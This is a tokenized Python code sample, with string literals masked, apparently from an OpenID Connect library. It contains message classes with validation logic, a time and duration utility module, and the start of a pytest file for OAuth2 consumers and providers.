strptime ( self [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> except ValueError : <EOL> try : <EOL> _ = time . strptime ( self [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> except ValueError : <EOL> try : <EOL> _ = time . 
strptime ( self [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> except ValueError : <EOL> raise VerificationError ( "<STR_LIT>" , self ) <EOL> return True <EOL> class RegistrationRequest ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : OPTIONAL_LOGICAL , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> } <EOL> c_default = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : [ "<STR_LIT:code>" ] } <EOL> c_allowed_values = { "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] } <EOL> def verify ( self , ** kwargs ) : <EOL> super ( RegistrationRequest , self ) . verify ( ** kwargs ) <EOL> if "<STR_LIT>" in self : <EOL> assert self [ "<STR_LIT>" ] . 
startswith ( "<STR_LIT>" ) <EOL> for param in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if "<STR_LIT>" % param in self : <EOL> if "<STR_LIT>" % param not in self : <EOL> self [ "<STR_LIT>" % param ] = "<STR_LIT>" <EOL> if "<STR_LIT>" % param in self : <EOL> assert "<STR_LIT>" % param in self <EOL> if "<STR_LIT>" in self : <EOL> assert self [ "<STR_LIT>" ] != "<STR_LIT:none>" <EOL> return True <EOL> class RegistrationResponse ( Message ) : <EOL> """<STR_LIT>""" <EOL> c_param = { <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> } <EOL> c_param . update ( RegistrationRequest . c_param ) <EOL> def verify ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( RegistrationResponse , self ) . verify ( ** kwargs ) <EOL> has_reg_uri = "<STR_LIT>" in self <EOL> has_reg_at = "<STR_LIT>" in self <EOL> if has_reg_uri != has_reg_at : <EOL> raise VerificationError ( ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) , self ) <EOL> return True <EOL> class ClientRegistrationErrorResponse ( message . ErrorResponse ) : <EOL> c_allowed_values = { "<STR_LIT:error>" : [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] } <EOL> class IdToken ( OpenIDSchema ) : <EOL> c_param = OpenIDSchema . c_param . copy ( ) <EOL> c_param . 
update ( { <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_INT , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING <EOL> } ) <EOL> def verify ( self , ** kwargs ) : <EOL> super ( IdToken , self ) . verify ( ** kwargs ) <EOL> if "<STR_LIT>" in self : <EOL> if "<STR_LIT>" in kwargs : <EOL> if kwargs [ "<STR_LIT>" ] not in self [ "<STR_LIT>" ] : <EOL> raise NotForMe ( "<STR_LIT>" , self ) <EOL> if len ( self [ "<STR_LIT>" ] ) > <NUM_LIT:1> : <EOL> try : <EOL> assert "<STR_LIT>" in self <EOL> except AssertionError : <EOL> raise VerificationError ( "<STR_LIT>" , self ) <EOL> else : <EOL> try : <EOL> assert self [ "<STR_LIT>" ] in self [ "<STR_LIT>" ] <EOL> except AssertionError : <EOL> raise VerificationError ( <EOL> "<STR_LIT>" , self ) <EOL> if "<STR_LIT>" in self : <EOL> if "<STR_LIT>" in kwargs : <EOL> if kwargs [ "<STR_LIT>" ] != self [ "<STR_LIT>" ] : <EOL> raise NotForMe ( "<STR_LIT>" , self ) <EOL> _now = time_util . 
utc_time_sans_frac ( ) <EOL> try : <EOL> _skew = kwargs [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> _skew = <NUM_LIT:0> <EOL> try : <EOL> _exp = self [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> raise MissingRequiredAttribute ( '<STR_LIT>' ) <EOL> else : <EOL> if ( _now - _skew ) > _exp : <EOL> raise EXPError ( '<STR_LIT>' ) <EOL> try : <EOL> _storage_time = kwargs [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> _storage_time = NONCE_STORAGE_TIME <EOL> try : <EOL> _iat = self [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> raise MissingRequiredAttribute ( '<STR_LIT>' ) <EOL> else : <EOL> if ( _iat + _storage_time ) < ( _now - _skew ) : <EOL> raise IATError ( '<STR_LIT>' ) <EOL> return True <EOL> class RefreshSessionRequest ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT:state>" : SINGLE_REQUIRED_STRING } <EOL> class RefreshSessionResponse ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT:state>" : SINGLE_REQUIRED_STRING } <EOL> class CheckSessionRequest ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_REQUIRED_STRING } <EOL> class CheckIDRequest ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_REQUIRED_STRING } <EOL> class EndSessionRequest ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING <EOL> } <EOL> class EndSessionResponse ( Message ) : <EOL> c_param = { "<STR_LIT:state>" : SINGLE_REQUIRED_STRING } <EOL> class Claims ( Message ) : <EOL> pass <EOL> class ClaimsRequest ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : OPTIONAL_MULTIPLE_Claims , <EOL> "<STR_LIT>" : OPTIONAL_MULTIPLE_Claims <EOL> } <EOL> class OpenIDRequest ( AuthorizationRequest ) : <EOL> pass <EOL> class ProviderConfigurationResponse ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , 
<EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : <EOL> OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : <EOL> OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : <EOL> OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_BOOLEAN , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_BOOLEAN , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_BOOLEAN , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_BOOLEAN , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> } <EOL> c_default = { "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> "<STR_LIT>" ] , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : False , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] } <EOL> def verify ( self , ** kwargs ) : <EOL> super ( ProviderConfigurationResponse , self ) . 
verify ( ** kwargs ) <EOL> if "<STR_LIT>" in self : <EOL> assert "<STR_LIT>" in self [ "<STR_LIT>" ] <EOL> for scope in self [ "<STR_LIT>" ] : <EOL> check_char_set ( scope , SCOPE_CHARSET ) <EOL> parts = urlparse ( self [ "<STR_LIT>" ] ) <EOL> try : <EOL> assert parts . scheme == "<STR_LIT>" <EOL> except AssertionError : <EOL> raise SchemeError ( "<STR_LIT>" ) <EOL> assert not parts . query and not parts . fragment <EOL> return True <EOL> class AuthnToken ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> } <EOL> class JasonWebToken ( Message ) : <EOL> c_param = { <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> "<STR_LIT>" : OPTIONAL_LIST_OF_STRINGS , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_INT , <EOL> "<STR_LIT>" : SINGLE_OPTIONAL_STRING , <EOL> } <EOL> def jwt_deser ( val , sformat = "<STR_LIT>" ) : <EOL> if sformat == "<STR_LIT>" : <EOL> sformat = "<STR_LIT>" <EOL> if sformat in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if not isinstance ( val , six . string_types ) : <EOL> val = json . dumps ( val ) <EOL> sformat = "<STR_LIT>" <EOL> return JasonWebToken ( ) . deserialize ( val , sformat ) <EOL> SINGLE_OPTIONAL_JWT = ( Message , False , msg_ser , jwt_deser , False ) <EOL> class UserInfoErrorResponse ( message . 
ErrorResponse ) : <EOL> c_allowed_values = { "<STR_LIT:error>" : [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] } <EOL> class DiscoveryRequest ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_REQUIRED_STRING , <EOL> "<STR_LIT>" : SINGLE_REQUIRED_STRING } <EOL> class DiscoveryResponse ( Message ) : <EOL> c_param = { "<STR_LIT>" : REQUIRED_LIST_OF_STRINGS } <EOL> class ResourceRequest ( Message ) : <EOL> c_param = { "<STR_LIT>" : SINGLE_OPTIONAL_STRING } <EOL> SCOPE2CLAIMS = { <EOL> "<STR_LIT>" : [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] , <EOL> "<STR_LIT:email>" : [ "<STR_LIT:email>" , "<STR_LIT>" ] , <EOL> "<STR_LIT:address>" : [ "<STR_LIT:address>" ] , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> "<STR_LIT>" : [ ] <EOL> } <EOL> MSG = { <EOL> "<STR_LIT>" : RefreshAccessTokenRequest , <EOL> "<STR_LIT>" : TokenErrorResponse , <EOL> "<STR_LIT>" : AccessTokenResponse , <EOL> "<STR_LIT>" : UserInfoRequest , <EOL> "<STR_LIT>" : AuthorizationResponse , <EOL> "<STR_LIT>" : AuthorizationErrorResponse , <EOL> "<STR_LIT>" : AuthorizationRequest , <EOL> "<STR_LIT>" : AccessTokenRequest , <EOL> "<STR_LIT>" : AddressClaim , <EOL> "<STR_LIT>" : OpenIDSchema , <EOL> "<STR_LIT>" : RegistrationRequest , <EOL> "<STR_LIT>" : RegistrationResponse , <EOL> "<STR_LIT>" : ClientRegistrationErrorResponse , <EOL> "<STR_LIT>" : IdToken , <EOL> "<STR_LIT>" : RefreshSessionRequest , <EOL> "<STR_LIT>" : RefreshSessionResponse , <EOL> "<STR_LIT>" : CheckSessionRequest , <EOL> "<STR_LIT>" : CheckIDRequest , <EOL> "<STR_LIT>" : EndSessionRequest , <EOL> "<STR_LIT>" : EndSessionResponse , <EOL> "<STR_LIT>" : Claims , <EOL> "<STR_LIT>" : OpenIDRequest , <EOL> "<STR_LIT>" : ProviderConfigurationResponse , <EOL> "<STR_LIT>" : AuthnToken , <EOL> "<STR_LIT>" 
: UserInfoErrorResponse , <EOL> "<STR_LIT>" : DiscoveryRequest , <EOL> "<STR_LIT>" : DiscoveryResponse , <EOL> "<STR_LIT>" : ResourceRequest , <EOL> } <EOL> def factory ( msgtype ) : <EOL> for name , obj in inspect . getmembers ( sys . modules [ __name__ ] ) : <EOL> if inspect . isclass ( obj ) and issubclass ( obj , Message ) : <EOL> try : <EOL> if obj . __name__ == msgtype : <EOL> return obj <EOL> except AttributeError : <EOL> pass <EOL> return message . factory ( msgtype ) </s>
<s> """<STR_LIT>""" <EOL> import calendar <EOL> import sys <EOL> import time <EOL> from datetime import datetime <EOL> from datetime import timedelta <EOL> import re <EOL> try : <EOL> from past . builtins import basestring <EOL> except ImportError : <EOL> pass <EOL> TIME_FORMAT = "<STR_LIT>" <EOL> TIME_FORMAT_WITH_FRAGMENT = re . compile ( <EOL> "<STR_LIT>" ) <EOL> class TimeUtilError ( Exception ) : <EOL> pass <EOL> def f_quotient ( arg0 , arg1 , arg2 = <NUM_LIT:0> ) : <EOL> if arg2 : <EOL> return int ( ( arg0 - arg1 ) // ( arg2 - arg1 ) ) <EOL> elif not arg0 : <EOL> return <NUM_LIT:0> <EOL> else : <EOL> return int ( arg0 // arg1 ) <EOL> def modulo ( arg0 , arg1 , arg2 = <NUM_LIT:0> ) : <EOL> if arg2 : <EOL> return ( ( arg0 - arg1 ) % ( arg2 - arg1 ) ) + arg1 <EOL> else : <EOL> return arg0 % arg1 <EOL> def maximum_day_in_month_for ( year , month ) : <EOL> return calendar . monthrange ( year , month ) [ <NUM_LIT:1> ] <EOL> D_FORMAT = [ <EOL> ( "<STR_LIT:Y>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:M>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:D>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:T>" , None ) , <EOL> ( "<STR_LIT:H>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:M>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT:S>" , "<STR_LIT>" ) <EOL> ] <EOL> def parse_duration ( duration ) : <EOL> index = <NUM_LIT:0> <EOL> if duration [ <NUM_LIT:0> ] == '<STR_LIT:->' : <EOL> sign = '<STR_LIT:->' <EOL> index += <NUM_LIT:1> <EOL> else : <EOL> sign = '<STR_LIT:+>' <EOL> assert duration [ index ] == "<STR_LIT:P>" <EOL> index += <NUM_LIT:1> <EOL> dic = dict ( [ ( typ , <NUM_LIT:0> ) for ( code , typ ) in D_FORMAT ] ) <EOL> for code , typ in D_FORMAT : <EOL> if duration [ index ] == '<STR_LIT:->' : <EOL> raise TimeUtilError ( "<STR_LIT>" ) <EOL> if code == "<STR_LIT:T>" : <EOL> if duration [ index ] == "<STR_LIT:T>" : <EOL> index += <NUM_LIT:1> <EOL> if index == len ( duration ) : <EOL> raise TimeUtilError ( "<STR_LIT>" ) <EOL> else : <EOL> raise TimeUtilError ( "<STR_LIT>" ) <EOL> else : <EOL> try : <EOL> mod = 
duration [ index : ] . index ( code ) <EOL> try : <EOL> dic [ typ ] = int ( duration [ index : index + mod ] ) <EOL> except ValueError : <EOL> if code == "<STR_LIT:S>" : <EOL> try : <EOL> dic [ typ ] = float ( duration [ index : index + mod ] ) <EOL> except ValueError : <EOL> raise TimeUtilError ( "<STR_LIT>" ) <EOL> else : <EOL> raise TimeUtilError ( <EOL> "<STR_LIT>" ) <EOL> index = mod + index + <NUM_LIT:1> <EOL> except ValueError : <EOL> dic [ typ ] = <NUM_LIT:0> <EOL> if index == len ( duration ) : <EOL> break <EOL> return sign , dic <EOL> def add_duration ( tid , duration ) : <EOL> ( sign , dur ) = parse_duration ( duration ) <EOL> if sign == '<STR_LIT:+>' : <EOL> temp = tid . tm_mon + dur [ "<STR_LIT>" ] <EOL> month = modulo ( temp , <NUM_LIT:1> , <NUM_LIT> ) <EOL> carry = f_quotient ( temp , <NUM_LIT:1> , <NUM_LIT> ) <EOL> year = tid . tm_year + dur [ "<STR_LIT>" ] + carry <EOL> temp = tid . tm_sec + dur [ "<STR_LIT>" ] <EOL> secs = modulo ( temp , <NUM_LIT> ) <EOL> carry = f_quotient ( temp , <NUM_LIT> ) <EOL> temp = tid . tm_min + dur [ "<STR_LIT>" ] + carry <EOL> minutes = modulo ( temp , <NUM_LIT> ) <EOL> carry = f_quotient ( temp , <NUM_LIT> ) <EOL> temp = tid . tm_hour + dur [ "<STR_LIT>" ] + carry <EOL> hour = modulo ( temp , <NUM_LIT> ) <EOL> carry = f_quotient ( temp , <NUM_LIT> ) <EOL> if dur [ "<STR_LIT>" ] > maximum_day_in_month_for ( year , month ) : <EOL> temp_days = maximum_day_in_month_for ( year , month ) <EOL> elif dur [ "<STR_LIT>" ] < <NUM_LIT:1> : <EOL> temp_days = <NUM_LIT:1> <EOL> else : <EOL> temp_days = dur [ "<STR_LIT>" ] <EOL> days = temp_days + tid . 
tm_mday + carry <EOL> while True : <EOL> if days < <NUM_LIT:1> : <EOL> pass <EOL> elif days > maximum_day_in_month_for ( year , month ) : <EOL> days -= maximum_day_in_month_for ( year , month ) <EOL> carry = <NUM_LIT:1> <EOL> else : <EOL> break <EOL> temp = month + carry <EOL> month = modulo ( temp , <NUM_LIT:1> , <NUM_LIT> ) <EOL> year += f_quotient ( temp , <NUM_LIT:1> , <NUM_LIT> ) <EOL> return time . localtime ( time . mktime ( ( year , month , days , hour , minutes , <EOL> secs , <NUM_LIT:0> , <NUM_LIT:0> , - <NUM_LIT:1> ) ) ) <EOL> else : <EOL> pass <EOL> def time_in_a_while ( days = <NUM_LIT:0> , seconds = <NUM_LIT:0> , microseconds = <NUM_LIT:0> , milliseconds = <NUM_LIT:0> , <EOL> minutes = <NUM_LIT:0> , hours = <NUM_LIT:0> , weeks = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> delta = timedelta ( days , seconds , microseconds , milliseconds , <EOL> minutes , hours , weeks ) <EOL> return datetime . utcnow ( ) + delta <EOL> def time_a_while_ago ( days = <NUM_LIT:0> , seconds = <NUM_LIT:0> , microseconds = <NUM_LIT:0> , milliseconds = <NUM_LIT:0> , <EOL> minutes = <NUM_LIT:0> , hours = <NUM_LIT:0> , weeks = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> delta = timedelta ( days , seconds , microseconds , milliseconds , <EOL> minutes , hours , weeks ) <EOL> return datetime . utcnow ( ) - delta <EOL> def in_a_while ( days = <NUM_LIT:0> , seconds = <NUM_LIT:0> , microseconds = <NUM_LIT:0> , milliseconds = <NUM_LIT:0> , <EOL> minutes = <NUM_LIT:0> , hours = <NUM_LIT:0> , weeks = <NUM_LIT:0> , time_format = TIME_FORMAT ) : <EOL> """<STR_LIT>""" <EOL> if not time_format : <EOL> time_format = TIME_FORMAT <EOL> return time_in_a_while ( days , seconds , microseconds , milliseconds , <EOL> minutes , hours , weeks ) . 
strftime ( time_format ) <EOL> def a_while_ago ( days = <NUM_LIT:0> , seconds = <NUM_LIT:0> , microseconds = <NUM_LIT:0> , milliseconds = <NUM_LIT:0> , <EOL> minutes = <NUM_LIT:0> , hours = <NUM_LIT:0> , weeks = <NUM_LIT:0> , time_format = TIME_FORMAT ) : <EOL> """<STR_LIT>""" <EOL> return time_a_while_ago ( days , seconds , microseconds , milliseconds , <EOL> minutes , hours , weeks ) . strftime ( time_format ) <EOL> def shift_time ( dtime , shift ) : <EOL> """<STR_LIT>""" <EOL> return dtime + timedelta ( seconds = shift ) <EOL> def str_to_time ( timestr , time_format = TIME_FORMAT ) : <EOL> """<STR_LIT>""" <EOL> if not timestr : <EOL> return <NUM_LIT:0> <EOL> try : <EOL> then = time . strptime ( timestr , time_format ) <EOL> except ValueError : <EOL> try : <EOL> elem = TIME_FORMAT_WITH_FRAGMENT . match ( timestr ) <EOL> except Exception as exc : <EOL> print >> sys . stderr , "<STR_LIT>" % ( exc , timestr ) <EOL> raise <EOL> then = time . strptime ( elem . groups ( ) [ <NUM_LIT:0> ] + "<STR_LIT>" , TIME_FORMAT ) <EOL> return time . gmtime ( calendar . timegm ( then ) ) <EOL> def instant ( time_format = TIME_FORMAT ) : <EOL> return time . strftime ( time_format , time . gmtime ( ) ) <EOL> def before ( point ) : <EOL> """<STR_LIT>""" <EOL> if not point : <EOL> return True <EOL> if isinstance ( point , basestring ) : <EOL> point = str_to_time ( point ) <EOL> elif isinstance ( point , int ) : <EOL> point = time . gmtime ( point ) <EOL> return time . gmtime ( ) < point <EOL> def after ( point ) : <EOL> """<STR_LIT>""" <EOL> if not point : <EOL> return True <EOL> else : <EOL> return not before ( point ) <EOL> not_before = after <EOL> not_on_or_after = before <EOL> valid = before <EOL> def later_than ( after , before ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( after , basestring ) : <EOL> after = str_to_time ( after ) <EOL> elif isinstance ( after , int ) : <EOL> after = time . 
gmtime ( after ) <EOL> if isinstance ( before , basestring ) : <EOL> before = str_to_time ( before ) <EOL> elif isinstance ( before , int ) : <EOL> before = time . gmtime ( before ) <EOL> return after >= before <EOL> def utc_time_sans_frac ( ) : <EOL> return int ( ( datetime . utcnow ( ) - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . total_seconds ( ) ) <EOL> def time_sans_frac ( ) : <EOL> return int ( "<STR_LIT>" % time . time ( ) ) <EOL> def epoch_in_a_while ( days = <NUM_LIT:0> , seconds = <NUM_LIT:0> , microseconds = <NUM_LIT:0> , milliseconds = <NUM_LIT:0> , <EOL> minutes = <NUM_LIT:0> , hours = <NUM_LIT:0> , weeks = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> dt = time_in_a_while ( days , seconds , microseconds , milliseconds , minutes , <EOL> hours , weeks ) <EOL> return int ( ( dt - datetime ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) ) . total_seconds ( ) ) </s>
<s> import json <EOL> import time <EOL> import pytest <EOL> import six <EOL> from future . backports . urllib . parse import urlparse <EOL> from future . backports . urllib . parse import parse_qs <EOL> from oic . oauth2 . message import AuthorizationRequest <EOL> from oic . oauth2 . message import AuthorizationResponse <EOL> from oic . oauth2 . message import AccessTokenRequest <EOL> from oic . oauth2 . message import AccessTokenResponse <EOL> from oic . oauth2 . message import TokenErrorResponse <EOL> from oic . oauth2 . consumer import Consumer <EOL> from oic . oauth2 . provider import Provider <EOL> from oic . utils . authn . authn_context import AuthnBroker <EOL> from oic . utils . authn . client import verify_client <EOL> from oic . utils . authn . user import UserAuthnMethod <EOL> from oic . utils . authz import Implicit <EOL> from oic . utils import sdb <EOL> CLIENT_CONFIG = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> CONSUMER_CONFIG = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:code>" , <EOL> "<STR_LIT>" : [ ] , <EOL> "<STR_LIT>" : "<STR_LIT:code>" , <EOL> } <EOL> ISSUER = "<STR_LIT>" <EOL> SERVER_INFO = { <EOL> "<STR_LIT:version>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ISSUER , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ "<STR_LIT:code>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> } <EOL> CDB = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT:password>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> '<STR_LIT>' : [ '<STR_LIT:code>' , '<STR_LIT>' ] <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ ( "<STR_LIT>" , None ) ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT:code>' , '<STR_LIT>' ] <EOL> } <EOL> } <EOL> def _eq ( l1 , l2 ) : <EOL> return set ( l1 ) == set ( l2 ) <EOL> class DummyAuthn ( UserAuthnMethod ) : <EOL> def __init__ ( self , srv , user ) : <EOL> UserAuthnMethod . 
